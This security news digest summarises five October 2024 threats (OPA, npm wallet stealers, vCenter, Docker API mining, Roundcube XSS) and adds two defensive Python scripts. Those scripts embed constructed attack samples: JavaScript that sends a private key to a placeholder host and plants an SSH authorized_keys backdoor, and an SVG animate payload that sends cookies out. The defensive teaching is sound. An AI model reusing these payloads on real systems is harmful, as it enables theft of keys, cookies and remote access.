Programmer’s Digest #105
10/16/2024-10/23/2024 Critical OPA Vulnerability, VMware Fixes Bad Patch For Critical vCenter Server RCE Flaw And More.
1. Critical OPA Vulnerability Exposes Windows Credentials
A now-patched flaw in Styra's Open Policy Agent (OPA), a widely deployed policy engine, could expose Windows credentials. The vulnerability, CVE-2024-8260, carries a CVSS score of 6.1 (medium severity). Tenable, which reported it, showed that if OPA's Windows build is handed a path on a remote share (a UNC path such as \\attacker\share\policy.rego) it opens the file over SMB and authenticates to that server with the credentials of the user running OPA, leaking an NTLM hash that can be cracked offline or relayed. The attacker needs some way to get that path in front of OPA: tricking a user into running OPA against a malicious file, or tampering with OPA's Rego rules or command-line arguments so they point at the attacker's server. The fix shipped in OPA v0.68.0, which rejects UNC paths; organizations running OPA on Windows should upgrade, and anything that wraps OPA should validate the paths it passes in.
2. Malicious npm Packages Target Developers’ Ethereum Wallets with SSH Backdoor
Researchers at Phylum discovered malicious packages on the npm registry designed to steal Ethereum private keys and gain remote access over SSH. The packages try to append the attacker's public key to the root user's authorized_keys file, which gives the attacker a persistent SSH login to the victim's machine. Published under names that imitate legitimate libraries, such as "ethers-mew" and "ethers-web3", they were likely released as a test run. The most developed of them, "ethers-mew", embeds code that exfiltrates Ethereum private keys to "ether-sign[.]com" and plants the SSH backdoor. Unlike the usual pattern, where a package's install script runs the payload as soon as npm install finishes, this code stays dormant until a developer imports the package and calls into it, so a scanner that only inspects install-time lifecycle scripts will not see it. Phylum noted that the packages and the authors' accounts were quickly removed, by the attackers themselves. This is not the first such campaign; similar packages have appeared on npm before.
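The triage script below is an added example, not Phylum's tooling: it separates the install-time hooks npm would run automatically from indicators in the package's runtime code, so a dormant payload of the kind described above still surfaces. The manifest, the `index.js` source and the `exfil.example` domain are constructed stand-ins, and the indicator list is a heuristic, not a complete signature set.

```python
"""Static triage of an npm package: install-time hooks vs. runtime payload.

Added example, not Phylum's code. The sample manifest and source are constructed to
mimic the campaign above (SSH backdoor plus key exfiltration, no install script);
exfil.example is a placeholder domain.
"""
import re
from typing import Dict, List, Tuple

LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare", "preuninstall", "postuninstall"}

# (pattern, reason) pairs; heuristic, chosen for the behaviours in the campaign above
INDICATORS: List[Tuple["re.Pattern[str]", str]] = [
    (re.compile(r"authorized_keys"), "writes to an SSH authorized_keys file"),
    (re.compile(r"/root/\.ssh|\$HOME/\.ssh|homedir\(\)"), "touches an SSH directory"),
    (re.compile(r"require\(['\"]child_process['\"]\)"), "spawns external commands"),
    (re.compile(r"https?://[\w.-]+"), "contacts an outbound URL"),
    (re.compile(r"privateKey|mnemonic", re.IGNORECASE), "handles wallet secrets"),
]


def lifecycle_hooks(manifest: dict) -> Dict[str, str]:
    """Scripts npm would run on its own at install time."""
    return {k: v for k, v in manifest.get("scripts", {}).items() if k in LIFECYCLE_HOOKS}


def suspicious_lines(source: str) -> List[Tuple[int, str, str]]:
    """(line number, reason, stripped line) for every indicator hit."""
    hits = []
    for n, line in enumerate(source.splitlines(), 1):
        for pat, reason in INDICATORS:
            if pat.search(line):
                hits.append((n, reason, line.strip()))
    return hits


def triage(manifest: dict, sources: Dict[str, str]) -> dict:
    """Combine hook and source findings into a verdict; flags runtime-only payloads."""
    hooks = lifecycle_hooks(manifest)
    findings = [(f, n, reason) for f, src in sources.items() for n, reason, _ in suspicious_lines(src)]
    reasons = {r for _, _, r in findings}
    if "writes to an SSH authorized_keys file" in reasons or (
        "handles wallet secrets" in reasons and "contacts an outbound URL" in reasons
    ):
        verdict = "malicious"
    elif findings:
        verdict = "review"
    else:
        verdict = "clean"
    return {"install_hooks": hooks, "runtime_only": bool(findings) and not hooks,
            "findings": findings, "verdict": verdict}


# Constructed sample: no lifecycle script, payload only fires when Wallet() is called.
SAMPLE_MANIFEST = {"name": "ethers-lookalike", "version": "1.0.0", "main": "index.js",
                   "scripts": {"test": "echo ok"}}
SAMPLE_INDEX_JS = """\
const fs = require('fs');
const https = require('https');
// runs only when the developer calls into the library, never at install time
function Wallet(privateKey) {
  const req = https.request('https://exfil.example/k', { method: 'POST' });
  req.end(privateKey);
  fs.appendFileSync('/root/.ssh/authorized_keys', 'ssh-ed25519 AAAA... attacker\\n');
  return privateKey;
}
module.exports = { Wallet };
"""

if __name__ == "__main__":
    result = triage(SAMPLE_MANIFEST, {"index.js": SAMPLE_INDEX_JS})
    print(result["verdict"], "runtime-only:", result["runtime_only"])
    for f, n, reason in result["findings"]:
        print(f"  {f}:{n}: {reason}")
```

Run it against a real package by loading `package.json` and the files it lists under `main` and `files`; the point of the `runtime_only` flag is that an empty `install_hooks` dict is not evidence of safety.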
3. VMware Fixes Bad Patch For Critical vCenter Server RCE Flaw
VMware has issued a new security update for CVE-2024-38812, a critical remote code execution flaw in vCenter Server that the September 2024 patch did not fully fix. Rated 9.8 (CVSS v3.1), the vulnerability is a heap overflow in vCenter's implementation of the DCE/RPC protocol and affects vCenter Server, vSphere and Cloud Foundation. Exploitation requires no user interaction: an attacker with network access to the service triggers the overflow by sending a crafted packet. The bug was found during the 2024 Matrix Cup hacking contest, where researchers also reported CVE-2024-38813, a related privilege escalation flaw. VMware urges users to apply the new patches for vCenter 7.0.3, 8.0.2 and 8.0.3; end-of-life versions such as vSphere 6.5 and 6.7 will not receive updates. There is no workaround, so the only compensating control while patching is to keep the vCenter management interface off untrusted networks. No active exploitation has been reported yet, but vCenter is a frequent target because compromising it gives control over every virtual machine it manages.
4. Cybercriminals Exploiting Docker API Servers for SRBMiner Crypto Mining Attacks
Threat actors are targeting exposed Docker remote API servers to deploy the SRBMiner cryptominer, according to Trend Micro. The attackers first probe for Docker API endpoints reachable from the internet, then ask the daemon to upgrade the connection to h2c (HTTP/2 in cleartext, without TLS) and speak gRPC to it over that connection. That lets them drive Docker's BuildKit functions (health checks, file synchronisation and finally a "/moby.buildkit.v1.Control/Solve" request) to build and start a container that fetches SRBMiner from GitHub and mines XRP cryptocurrency for the attacker. Taking the gRPC-over-h2c path rather than the plain REST API is what lets the activity slip past controls that only watch the usual container-creation calls. Trend Micro has also seen Docker API servers abused to deploy the perfctl malware, which creates a container to download and execute further payloads. Administrators should not expose the Docker daemon over TCP without mutual TLS (tlsverify), should restrict who can reach it at the network level, and should monitor for unexpected h2c upgrades, BuildKit gRPC calls and container creation from unknown sources.
5. Roundcube XSS Flaw Exploited to Steal Credentials, Email (CVE-2024-37383)
Attackers exploited a cross-site scripting vulnerability (CVE-2024-37383) in the Roundcube Webmail client to target a governmental organization in a CIS country. The flaw was fixed in May 2024 in Roundcube 1.5.7 and 1.6.7; earlier releases are affected. The exploit was delivered by email in June 2024. CVE-2024-37383 lets an attacker inject script through attributes of SVG animate elements that Roundcube's HTML sanitizer failed to strip. In this case the message contained hidden JavaScript that ran as soon as the recipient opened the mail in the browser, downloading a decoy document while attempting to steal messages and login credentials. XSS flaws in Roundcube have been exploited before, including by state-sponsored actors targeting government entities. Roundcube is not the most widely used webmail client, but it is a frequent target because government agencies run it, and because script injected into a webmail page runs inside the victim's authenticated mail session the moment the message is rendered.
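The sanitizer below is an added example, not Roundcube's washtml code: it mimics the post-fix policy of not accepting SVG animation elements from untrusted mail, and reports why each removed element was dangerous (an `animate` that targets `href`, or that carries a `javascript:` or `data:` value, is the shape of attack the text describes). The sample message is constructed and `exfil.example` is a placeholder; the parser is Python's stdlib `html.parser`, not Roundcube's.

```python
"""Strip SVG animation elements from an HTML mail body before it is rendered.

Added example, not Roundcube's code. Sample mail is constructed; exfil.example is a placeholder.
"""
from html import escape
from html.parser import HTMLParser
from typing import Dict, List, Tuple

ANIMATION_TAGS = {"animate", "animatetransform", "animatemotion", "set"}
URL_ATTRS = {"href", "xlink:href", "src"}
VALUE_ATTRS = ("values", "to", "from", "by")


def animation_risk(attrs: Dict[str, str]) -> str:
    """Why an animation element is dangerous; empty string if it looks benign."""
    target = (attrs.get("attributename") or "").lower()   # html.parser lowercases attribute names
    if target in URL_ATTRS:
        return f"animates {target}, can point a link at a script URL"
    for a in VALUE_ATTRS:
        v = (attrs.get(a) or "").lower().replace(" ", "")
        if "javascript:" in v or "data:" in v:
            return f"{a} attribute carries a script/data URL"
    return ""


class SvgAnimationStripper(HTMLParser):
    """Re-serialises the document, dropping animation elements (their children are kept)."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=False)
        self.out: List[str] = []
        self.dropped: List[Tuple[str, str]] = []   # (tag, reason)

    def _drop(self, tag: str, attrs) -> bool:
        if tag in ANIMATION_TAGS:
            self.dropped.append((tag, animation_risk(dict(attrs)) or "animation element not allowed in mail"))
            return True
        return False

    @staticmethod
    def _fmt(attrs) -> str:
        return "".join(f' {k}="{escape(v or "", quote=True)}"' for k, v in attrs)

    def handle_starttag(self, tag, attrs):
        if not self._drop(tag, attrs):
            self.out.append(f"<{tag}{self._fmt(attrs)}>")

    def handle_startendtag(self, tag, attrs):
        if not self._drop(tag, attrs):
            self.out.append(f"<{tag}{self._fmt(attrs)}/>")

    def handle_endtag(self, tag):
        if tag not in ANIMATION_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")


def sanitize_mail_html(body: str) -> Tuple[str, List[Tuple[str, str]]]:
    """Return (cleaned HTML, list of dropped elements with the reason each was dropped)."""
    p = SvgAnimationStripper()
    p.feed(body)
    p.close()
    return "".join(p.out), p.dropped


# Constructed message: an SVG link whose href is only set by an <animate>, so a naive
# href check on <a> sees nothing, yet the rendered link runs script in the mail session.
SAMPLE_MAIL = (
    '<p>Quarterly report attached.</p>'
    '<svg><a><animate attributeName="href" values="javascript:fetch(\'https://exfil.example/?c=\'+document.cookie)"/>'
    '<text x="10" y="20">open</text></a></svg>'
)

if __name__ == "__main__":
    clean, dropped = sanitize_mail_html(SAMPLE_MAIL)
    print(clean)
    for tag, reason in dropped:
        print(f"dropped <{tag}>: {reason}")
```

Dropping the whole element class, rather than only the attribute combinations known to be bad, is the safer policy for mail: there is no legitimate reason for a message to animate SVG in a webmail view, and every new attribute that can carry a URL would otherwise need its own rule.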